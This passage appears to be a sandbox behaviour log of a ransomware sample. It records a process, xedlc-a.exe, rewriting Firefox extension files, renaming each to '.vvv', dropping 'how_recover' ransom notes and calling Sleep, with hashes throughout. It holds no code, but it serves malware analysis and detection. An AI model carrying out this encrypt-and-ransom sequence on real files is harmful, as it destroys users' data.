- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\selection.js.vvv
- ads:
- fid (ads:): 562949953476244
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75404
- mode: open
- sequenceNumber: 1081
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\simple-storage.js
- filesize: 8614
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765867
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75442
- mode: close
- sequenceNumber: 1082
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\simple-storage.js
- filesize: 9038
- md5sum: efed7f80c4d7cce1b13ebded19ff6fed
- sha1sum: 2b1ccd3f8af252ad87ebace8f63b4c21d3f0711d
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765867
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75457
- mode: rename
- sequenceNumber: 1083
- filesize: 9038
- md5sum: efed7f80c4d7cce1b13ebded19ff6fed
- sha1sum: 2b1ccd3f8af252ad87ebace8f63b4c21d3f0711d
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\simple-storage.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\simple-storage.js.vvv
- ads:
- fid (ads:): 281474976765867
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75469
- mode: open
- sequenceNumber: 1084
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tabs.js
- filesize: 2723
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765865
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75545
- mode: close
- sequenceNumber: 1085
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tabs.js
- filesize: 3150
- md5sum: fe585b6dc42dd7f80259fa49f67d3c4e
- sha1sum: 168e8e8bcaddc9785d01d016210290b344fd75f7
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765865
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75561
- mode: rename
- sequenceNumber: 1086
- filesize: 3150
- md5sum: fe585b6dc42dd7f80259fa49f67d3c4e
- sha1sum: 168e8e8bcaddc9785d01d016210290b344fd75f7
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tabs.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tabs.js.vvv
- ads:
- fid (ads:): 281474976765865
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75572
- mode: open
- sequenceNumber: 1087
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\timers.js
- filesize: 1821
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476256
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75604
- mode: close
- sequenceNumber: 1088
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\timers.js
- filesize: 2238
- md5sum: a45bdb270d97ee7e7267060c0096d8e6
- sha1sum: 24e4972740229324d7cb46cdef937635bc574c5f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476256
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75617
- mode: rename
- sequenceNumber: 1089
- filesize: 2238
- md5sum: a45bdb270d97ee7e7267060c0096d8e6
- sha1sum: 24e4972740229324d7cb46cdef937635bc574c5f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\timers.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\timers.js.vvv
- ads:
- fid (ads:): 562949953476256
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75628
- mode: open
- sequenceNumber: 1090
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\widget.js
- filesize: 29701
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476246
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75746
- mode: close
- sequenceNumber: 1091
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\widget.js
- filesize: 30126
- md5sum: 9bed38cef9faaec63d2f79e4cfedd3ab
- sha1sum: 2cbc8860d7a673f3bbcd42f967cf2274a487d433
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476246
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75759
- mode: rename
- sequenceNumber: 1092
- filesize: 30126
- md5sum: 9bed38cef9faaec63d2f79e4cfedd3ab
- sha1sum: 2cbc8860d7a673f3bbcd42f967cf2274a487d433
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\widget.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\widget.js.vvv
- ads:
- fid (ads:): 562949953476246
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75770
- mode: open
- sequenceNumber: 1093
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\windows.js
- filesize: 8643
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765908
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75861
- mode: close
- sequenceNumber: 1094
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\windows.js
- filesize: 9070
- md5sum: 204abd59621d913a45fe8833d689ee1f
- sha1sum: 9633da02d317c1379725fc778c73f3ccb7cef200
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765908
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75873
- mode: rename
- sequenceNumber: 1095
- filesize: 9070
- md5sum: 204abd59621d913a45fe8833d689ee1f
- sha1sum: 9633da02d317c1379725fc778c73f3ccb7cef200
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\windows.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\windows.js.vvv
- ads:
- fid (ads:): 281474976765908
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75885
- mode: created
- sequenceNumber: 1096
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778333
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75892
- mode: close
- sequenceNumber: 1097
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778333
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75981
- mode: created
- sequenceNumber: 1098
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778334
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75991
- mode: close
- sequenceNumber: 1099
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778334
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76006
- mode: open
- sequenceNumber: 1100
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bootstrap-remote-process.js
- filesize: 6665
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765916
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76195
- mode: close
- sequenceNumber: 1101
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bootstrap-remote-process.js
- filesize: 7086
- md5sum: 9e90c098aeea3b332757b2e06029c3fd
- sha1sum: 7d1dbc75b2a7a913c9e4564ec97daef2032412b9
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765916
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76408
- mode: rename
- sequenceNumber: 1102
- filesize: 7086
- md5sum: 9e90c098aeea3b332757b2e06029c3fd
- sha1sum: 7d1dbc75b2a7a913c9e4564ec97daef2032412b9
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bootstrap-remote-process.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bootstrap-remote-process.js.vvv
- ads:
- fid (ads:): 281474976765916
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76421
- mode: open
- sequenceNumber: 1103
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\test-content-symbiont.js
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765906
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76431
- mode: created
- sequenceNumber: 1104
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778335
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76441
- mode: close
- sequenceNumber: 1105
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778335
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76454
- mode: created
- sequenceNumber: 1106
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778336
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76464
- mode: close
- sequenceNumber: 1107
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778336
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76476
- mode: open
- sequenceNumber: 1108
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api-utils.js
- filesize: 7265
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765857
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 76501
- repeat: 90
- sequenceNumber: 1109
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 76621
- mode: close
- sequenceNumber: 1110
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api-utils.js
- filesize: 7694
- md5sum: cb099f331f77a004f0e4f0deb0b04e3c
- sha1sum: 815a0f7ce947e1c55436c48eff82aecf5ef8e963
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765857
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76635
- mode: rename
- sequenceNumber: 1111
- filesize: 7694
- md5sum: cb099f331f77a004f0e4f0deb0b04e3c
- sha1sum: 815a0f7ce947e1c55436c48eff82aecf5ef8e963
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api-utils.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api-utils.js.vvv
- ads:
- fid (ads:): 281474976765857
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76646
- mode: open
- sequenceNumber: 1112
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app-strings.js
- filesize: 3345
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765874
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76697
- mode: close
- sequenceNumber: 1113
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app-strings.js
- filesize: 3774
- md5sum: 806ac47c9e8beb2c30a091195bf911f2
- sha1sum: 46fc663976e9eaa891e8bf9cbd95efb1e69aff19
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765874
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76710
- mode: rename
- sequenceNumber: 1114
- filesize: 3774
- md5sum: 806ac47c9e8beb2c30a091195bf911f2
- sha1sum: 46fc663976e9eaa891e8bf9cbd95efb1e69aff19
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app-strings.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app-strings.js.vvv
- ads:
- fid (ads:): 281474976765874
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76721
- mode: open
- sequenceNumber: 1115
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\array.js
- filesize: 3428
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765911
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76768
- mode: close
- sequenceNumber: 1116
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\array.js
- filesize: 3854
- md5sum: 6a11ee25ce99a7e5be5fb867f9f36501
- sha1sum: 8f2f476c3ffda1ed6ea781fcc9e5d6abe54f92ee
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765911
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76784
- mode: rename
- sequenceNumber: 1117
- filesize: 3854
- md5sum: 6a11ee25ce99a7e5be5fb867f9f36501
- sha1sum: 8f2f476c3ffda1ed6ea781fcc9e5d6abe54f92ee
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\array.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\array.js.vvv
- ads:
- fid (ads:): 281474976765911
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76797
- mode: open
- sequenceNumber: 1118
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byte-streams.js
- filesize: 4280
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765872
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76866
- mode: close
- sequenceNumber: 1119
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byte-streams.js
- filesize: 4702
- md5sum: 66d3f370814804bcdf11b82a3a6203c0
- sha1sum: 1c0624cccbc575d3607b74c65bb3b25d11a60135
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765872
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76879
- mode: rename
- sequenceNumber: 1120
- filesize: 4702
- md5sum: 66d3f370814804bcdf11b82a3a6203c0
- sha1sum: 1c0624cccbc575d3607b74c65bb3b25d11a60135
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byte-streams.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byte-streams.js.vvv
- ads:
- fid (ads:): 281474976765872
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76893
- mode: open
- sequenceNumber: 1121
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\collection.js
- filesize: 4774
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
